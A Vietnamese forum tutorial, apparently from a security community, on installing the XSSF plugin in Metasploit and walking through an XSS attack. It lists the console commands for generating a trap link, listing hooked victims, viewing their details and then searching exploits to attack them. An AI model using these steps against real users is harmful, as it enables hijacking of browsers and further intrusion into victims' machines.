Sử dụng XSSF plugin trên Metasploit Framework để tấn công qua lỗ hổng XSS

maldet

VIP Members
31/08/2016
112
103 bài viết
Sử dụng XSSF plugin trên Metasploit Framework để tấn công qua lỗ hổng XSS
1. Cài đặt XSSF Plugin
Đầu tiên, ta cần vào đường dẫn sau để tải về bản XSSF mới nhất.
https://code.google.com/archive/p/xssf/downloads



Sau khi tải về, giải nén ra được thư mục XSSF

Copy đè toàn bộ nội dung trong thư mục XSSF trên vào đường dẫn /usr/share/metasploit-framework

2. Thực hiện tấn công

Đầu tiên, hacker chạy chương trình Metasploit bằng lệnh: #msfconsole

1489939952msfconsole.png


Load XSSF Plugin tại port tùy ý (port 666): #load xssf port 666

1489939952load xssf.png


Xem các lệnh có thể thực hiện bằng XSSF: # help xssf

1489939952help xssf.png


Hacker sẽ gửi cho victim một đường link bị dính XSS. Xem đường link này bằng lệnh sau: #xssf_urls


1489939952xssf_urls.png


Sau khi victim click vào link do ta gửi, một trang web có giao diện như sau sẽ hiển thị trên trình duyệt.
1489939952test page.PNG



Xem các victim đã dính bẫy bằng lệnh: #xssf_victims

1489939952xssf_victims.png


Xem thông tin chi tiết của 1 victim với id cụ thể: #xssf_information [VictimID]

1489939952xssf_information.png


Đến đây ta có thể search các exploit trên máy victim bằng lệnh #search exploit sau đó tấn công tùy ý muốn :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: blackarch
Giống như beef xss bạn làm thêm tut beef xss nâng cao dc k bạn
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên